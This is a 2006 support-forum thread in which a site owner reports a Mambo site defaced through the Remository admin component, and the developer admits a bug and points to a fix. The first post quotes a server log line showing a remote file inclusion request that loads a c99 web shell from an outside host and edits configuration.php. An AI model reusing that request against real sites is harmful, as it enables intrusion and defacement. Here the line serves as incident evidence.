Home arrow Forum

Remository Forum

 


dogsbody

Karma: 0  
Mambo hacked via remository - 2006/08/11 10:24 Hi,

Today my mambo site was hacked and all pages replaced with THIS.

The hack was pretty simple, mambo's configuration.php file was overwritten which instantly replaced all the site pages with this one.

Looking at my log files it looks like they got in via the remository admin interface!...

88.240.237.27 - - [11/Aug/2006:09:42:42 +0100] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F% 2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb HTTP/1.1" 200 3703 "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http%3A%2F% 2Fdeadbone.by.ru%2Fc99.txt%3Fcmd&act=f&f=configuration.php&ft=edit&d=%2Fhome%2Fsites%2Fsite3%2Fweb" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
  | | Sorry, you do not currently have permission to write here.
admin

Karma: 112  
Re:Mambo hacked via remository - 2006/08/11 19:01 Sorry, I overlooked an error in admin.remository.php - please see this post in the forum or look at http://forum.mamboguru.com/showthread.php?t=433.

Post edited by: admin, at: 2006/08/11 14:02
Martin Brampton aka Counterpoint
http://aliro.org
http://black-sheep-research.com
  | | Sorry, you do not currently have permission to write here.
121books.org

Karma: 0  
Re:Mambo hacked via remository - 2006/08/12 14:58

Post edited by: 121books.org, at: 2007/03/31 00:31
  | | Sorry, you do not currently have permission to write here.
admin

Karma: 112  
Re:Mambo hacked via remository - 2006/08/13 14:53 There is a mass mail component, but if I remember rightly, that had a security vulnerability Martin Brampton aka Counterpoint
http://aliro.org
http://black-sheep-research.com
  | | Sorry, you do not currently have permission to write here.

Save FM Radio

Login

Subscribe to Premium Support

Get priority support for Remository and Glossary, sign up now for a Premium Support monthly subscription:

Your Remository user name

Or purchase a year's support:

Your Remository user name

Who is Online

Remository welcomes guests and visitors

Real Time Web Analytics